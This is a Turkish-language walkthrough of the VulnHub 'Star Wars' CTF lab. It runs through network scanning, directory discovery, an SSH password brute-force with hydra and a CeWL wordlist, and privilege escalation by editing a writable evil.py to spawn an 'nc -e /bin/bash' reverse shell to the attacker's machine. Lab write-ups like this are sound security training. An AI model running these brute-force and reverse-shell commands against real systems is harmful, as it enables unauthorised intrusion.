CTF: VulnHub- Star Wars Makine Çözümü

Makine Hakkında Bilgiler

Bu makinenin çözümü için önerilen platform VirtualBox‘ dır.

Makinenin amacı makineye saldırarak, root haklarına sahip olup bayrağı ele geçirmek.

Makinenin VulnHub sayfasındaki linki: https://www.vulnhub.com/entry/star-wars-ctf-1,528/

O zaman hadi makineyi çözmeye başlayalım

Makinenin Çözüm Adımları

1. İlk olarak saldırı yapacağımız yani kendi sanal makinemizin ip adresini öğreniyoruz.

**ifconfig** komutu ile ip adresimizi öğreniyoruz. 10.0.2.6 olduğunu tespit ettik.

2. Şimdi de saldırı yapacağımız hedefi tespit etmemiz lazım. Bunun için netdiscover kullanacağım.

**netdiscover -r 10.0.2.0/24** komutu yardımıyla hedefin 10.0.2.11 ip adresine sahip olduğunu keşfettik.

3. Şimdi makine hakkında bilgiler elde etmek adına nmap komutunu çalıştıracağım.

**nmap -n -Pn -A -sV -sC -p- 10.0.2.11** komutunu çalıştırıyorum.
Buradaki parametreleri incelersek;
-n: DNS çözümlemesi yapma demek.
-Pn: Pingleri devre dışı bırakma.
-A: Agresif tarama yap.
-sV: Açık portta çalışan servisin ne olduğunu bulmaya çalışır.-sC ile birlikte kullanılırsa işe yarar.
-sC: -sV ile versiyon tespiti yaparken nmap scriptlerini kullanır.
-p-: 65535 portun hepsini tarar.
En sonda da hedef sistemin ip adresi yani 10.0.2.11

22 SSH ve 80 HTTP portları açık

4. Hemen ilk olarak tarayıcıma 10.0.2.11 yazarak gidiyorum.

Burada resimleri makineme kaydediyorum ve https://stylesuxx.github.io/steganography/ sitesine giderek resimlerdeki gizli mesajları buluyoruz.

5. Siteye resmi yüklediğim zaman

6. Şimdi de sayfamızın alt dizinlerini bulalım. Bunun için de gobuster kullanacağız.

**gobuster dir -u 10.0.2.11 -w /usr/share/wordlists/MyLists/DirectoryListMedium.txt** kodumuzu çalıştırıyoruz.
Burada tüm dizinleri kontrol ediyoruz sadece robots.txt de bir veriyle karşılaşıyoruz. O da /r2d2 bu dizinin olduğunu söylüyor.
Bu dizine gidiyorum buradan da bir şey çıkmıyor.

7. /users.js dizinine gidiyorum

Burada iki adet isim var. Artık bunları ssh la giriş yapmaya çalışmaktan başka seçeneğimiz kalmadı. Elimizde 2 kullanıcı ve 1 şifre var. Skywalker la deneyince olmadı ama han ile deneyince ssh’ la sisteme bağlanmayı başardık

8. Makinede gezmeye başlıyoruz. İlk olarak home un altına gidiyorum. Kullanıcıları tek tek geziyorum. Burada Darth’ ın içinde .secrets’ in içinde evil.py olduğunu görüyorum

9. Şimdi skywalker yetkisine sahip olmak için hydra kullanacaz.

Bunun öncesinde /r2d2 dizinindeki kelimelerden kendi wordlistimi oluşturacam.

**cewl 10.0.2.11/r2d2 -w /root/Desktop/wordlist.txt -d 1 -m 5** kodu ile wordlistimi oluşturuyorum.

10. Artık hydra ile saldırımı başlatabilirim.

**hydra -l skywalker -P /root/Desktop/wordlist.txt 10.0.2.11 -t 4 ssh** kodumuzu yazınca şifrenin tatooine olduğunu buluyoruz. Artık skywalker ile sisteme bağlanabiliriz.

11. İlk olarak erişim yetkilerime bakıyorum

**https://gtfobins.github.io/** sitesinden kontrol edince bunların hiçbirinin işe yaramadığını görüyorum.

12. En son Darth’ ın içinde evil.py vardı. Orada han’ ın değişiklik yapma yetkisi yoktu. Oraya gidip kontrol edince nano ile erişim yetkim olduğunu görüyorum.

13. O zaman reverse shell yaparak evil.py yi düzenleyip root yetkisine sahip olabilir. Bunun için ilk olarak kali makinemde yeni bir terminal açıyorum ve dinlemeyi başlatıyorum. (nc -lvnp 1234)

14. evil.py dosyasının içeriğini düzenliyorum;

import os

os.system(“nc -e /bin/bash 10.0.2.6 1234”)

kaydederek çıkıyorum

15. Artık python3 evil.py diyince natcat bağlantımın aktif olduğunu görüyorum